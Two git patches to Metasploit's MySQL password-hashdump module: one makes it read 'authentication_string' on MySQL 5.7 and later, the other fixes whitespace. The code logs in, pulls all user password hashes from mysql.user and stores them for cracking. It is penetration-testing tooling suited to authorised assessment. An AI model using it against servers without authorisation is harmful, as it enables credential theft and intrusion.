From 00ead052370fd5cc3b210548ba00769c3fe676a7 Mon Sep 17 00:00:00 2001 From: Osanda Malith Jayathissa Date: Thu, 8 Feb 2018 13:40:35 +0000 Subject: [PATCH 1/2] Update for MySQL 5.7 and above Starting from MySQL 5.7 the password column was changed to authentication_string. I've added a check to determine the version. Tested on both MySQL 5.6 and 5.7. --- modules/auxiliary/scanner/mysql/mysql_hashdump.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index 65fb904c6d..c6fb668626 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -57,7 +57,12 @@ class MetasploitModule < Msf::Auxiliary create_credential_login(login_data) #Grabs the username and password hashes and stores them as loot - res = mysql_query("SELECT user,password from mysql.user") + version = mysql_get_variable("@@version") + if (5.6 < version[0..2].to_f) + res = mysql_query("SELECT user,authentication_string from mysql.user") + else + res = mysql_query("SELECT user,password from mysql.user") + end if res.nil? print_error("There was an error reading the MySQL User Table") return From 1bb5499fceab9722aff853e1e77dad79d9a09496 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 8 Feb 2018 13:48:24 -0600 Subject: [PATCH 2/2] fix whitespace --- .../auxiliary/scanner/mysql/mysql_hashdump.rb | 112 +++++++++--------- 1 file changed, 54 insertions(+), 58 deletions(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index c6fb668626..f1adde3fe7 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -12,10 +12,10 @@ class MetasploitModule < Msf::Auxiliary def initialize super( 'Name' => 'MYSQL Password Hashdump', - 'Description' => %Q{ + 'Description' => %( This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. - }, + ), 'Author' => ['theLightCosine'], 'License' => MSF_LICENSE ) @@ -23,53 +23,10 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) - if (not mysql_login_datastore) - return - end + return unless mysql_login_datastore service_data = { - address: ip, - port: rport, - service_name: 'mysql', - protocol: 'tcp', - workspace_id: myworkspace_id - } - - credential_data = { - module_fullname: self.fullname, - origin_type: :service, - private_data: datastore['PASSWORD'], - private_type: :password, - username: datastore['USERNAME'] - } - - credential_data.merge!(service_data) - - credential_core = create_credential(credential_data) - - login_data = { - core: credential_core, - last_attempted_at: DateTime.now, - status: Metasploit::Model::Login::Status::SUCCESSFUL - } - login_data.merge!(service_data) - - create_credential_login(login_data) - - #Grabs the username and password hashes and stores them as loot - version = mysql_get_variable("@@version") - if (5.6 < version[0..2].to_f) - res = mysql_query("SELECT user,authentication_string from mysql.user") - else - res = mysql_query("SELECT user,password from mysql.user") - end - if res.nil? - print_error("There was an error reading the MySQL User Table") - return - end - - service_data = { - address: ::Rex::Socket.getaddress(rhost,true), + address: ip, port: rport, service_name: 'mysql', protocol: 'tcp', @@ -77,10 +34,54 @@ class MetasploitModule < Msf::Auxiliary } credential_data = { - origin_type: :service, - jtr_format: 'mysql,mysql-sha1', - module_fullname: self.fullname, - private_type: :nonreplayable_hash + module_fullname: self.fullname, + origin_type: :service, + private_data: datastore['PASSWORD'], + private_type: :password, + username: datastore['USERNAME'] + } + + credential_data.merge!(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + core: credential_core, + last_attempted_at: DateTime.now, + status: Metasploit::Model::Login::Status::SUCCESSFUL + } + login_data.merge!(service_data) + + create_credential_login(login_data) + + # Grab the username and password hashes and store them as loot + version = mysql_get_variable("@@version") + + # Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'. + if version[0..2].to_f > 5.6 + res = mysql_query("SELECT user,authentication_string from mysql.user") + else + res = mysql_query("SELECT user,password from mysql.user") + end + + if res.nil? + print_error("There was an error reading the MySQL User Table") + return + end + + service_data = { + address: ::Rex::Socket.getaddress(rhost, true), + port: rport, + service_name: 'mysql', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + jtr_format: 'mysql,mysql-sha1', + module_fullname: self.fullname, + private_type: :nonreplayable_hash } credential_data.merge!(service_data) @@ -92,17 +93,12 @@ class MetasploitModule < Msf::Auxiliary print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}") credential_core = create_credential(credential_data) login_data = { - core: credential_core, - status: Metasploit::Model::Login::Status::UNTRIED + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED } login_data.merge!(service_data) create_credential_login(login_data) end end - end - - - - end